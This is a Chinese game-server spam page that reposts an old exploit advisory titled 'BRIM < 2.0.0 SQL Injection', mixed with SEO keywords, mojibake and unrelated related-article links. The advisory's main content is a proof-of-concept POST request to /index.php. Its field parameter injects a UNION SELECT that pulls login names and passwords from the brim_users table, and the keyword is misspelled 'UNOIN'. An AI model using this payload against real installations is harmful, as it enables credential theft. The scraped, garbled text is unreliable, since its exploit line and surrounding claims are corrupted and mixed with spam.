• 传世开服网
  • 首页
  • 新开传世游戏
  • 最新传奇世界
  • 传奇世界页游
  • 网页变态传世
default blue green orange red
主页 > 最新传奇世界 > > 正文

BRIM 2.0.0 热门变态传世SQL注射缺陷及修复

  • BRIM < 2.0.0 SQL注射信息
    标题: BRIM < 2.0.0 SQL Injection
    作者: ifnull
    测试平台: Apache/2.2.3, PHP/5.1.6, MySQL 5.0.45 �尽管它可以在任何环境下运行.
     Example uses MySQL 5 query escape but can easily be ported to prior versions of MySQL.
    描述: Unlike CVE-2008-4082, this will work with or without
       magic_quotes_gpc enabled. Like the last exploit however, you must first
       create an account and enable "tasks". By default anyone can create an
       account and the accounts are automatically approved.
    程序信息
    版本: < 2.0.0
    地址:
    描述:
     
    BRIM is a MVC framework, written in PHP and based on
       items with a hierarchical relationship. The list of plugins make BRIM a
       Information Manager with plugins like bookmarks, a calendar, contacts
       tasks, notes, RSS etc. The application is multilingual.
    Proof of ConceptPOST
    URI: /index.php
    Data: plugin=tasks&field=1%3D1%20UNOIN%20SELECT%201%2C2%2C3%2C4%2CCONCAT(loginname%2C0x3a%2Cpassword)%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%20from%20brim_users--&value=asdf&action=searchTasks
     

    ,热门变态传世

相关文章

  • 云计算落后亚马变态网页传世逊
  • 《变态传奇世界网页版》影帝互飚
  • 4399《新六界仙尊》圣灵羽翼觉醒
  • 变态传奇世界网页版联姻QQ三国
  • 3D真实驾驶手机版下载【官方安卓
  • 如何消除汽车盲区?敏视3D全景环
  • 热门变态传奇世界新开变态传奇世
  • 信访维权别越红线保持理性找法用
  • 个人征信报告去哪里打,个人征信
  • 爸爸去哪儿减速泡泡降低你的速度
  • Copyright © 传世开服网 版权所有